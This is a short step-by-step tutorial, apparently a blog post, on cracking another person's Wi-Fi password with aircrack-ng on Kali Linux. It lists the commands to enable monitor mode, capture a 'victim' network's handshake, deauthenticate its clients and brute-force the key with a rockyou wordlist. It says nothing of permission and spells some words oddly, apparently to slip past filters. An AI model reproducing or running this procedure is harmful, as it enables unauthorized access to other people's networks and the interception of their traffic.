For this tutorial, you need Kali Linux or Parrot Sec OS or even Ubuntu will work
You can get Kali Linux from kali.org and I am gonna use that in this tutorial
So first of all we need to update our Linux distro by typing this command
apt update && apt upgrade -y
If you are doing it in a VM or in a environment in which you can't connect to wifi or if your network card does not support packet injection then you need to buy a new one you can check by googling that either your card will work for wifi häçking or not
The good choice is This One you can get this for a cheap price
So after the setup connect your wifi adapter with pc and then start the tutorial now type these commands
First, open your terminal and type these commands
1 airmon-ng check kill
[to check the process to kill to start the process]
2 airmon-ng
3 airmon-ng start wlan0 {wlan0 can vary acc to your device you can see the name for your one by typing ifconfig}
[make the wifi card ready for wifi häçking]
4 airodump-ng wlan0mon
[starting the attack will capture everything now note the channel name and bssid of your target wifi ]
5 airodump-ng -c (ur victims channel here ) – -write /root/Desktop/häçk —bssid (bssid) wlan0mon
[now the attack started]
6 aireplay-ng -0 0 -a (Bssid) wlan0mon
{Bssid will be of your victim}
7 a i r c r a c k(no space edit nyo nalang)-ng -a2 -b (bssid) -w /root/Desktop/rockyou.txt {file of your wordlist } /root/Desktop/häçk-01.cap {path of captured file}
if now the user password was in your wordlist then you will get the password is not present then try a different wordlist in the next tutorial I will tell you how to create a wordlist for a specific user and even a full proof method that gives you great success results
NOTE: The 7th command will end according to your computer speed it depends on your machine power and even it can take a lot long as it depends on your Wordlist and computer
Good luck
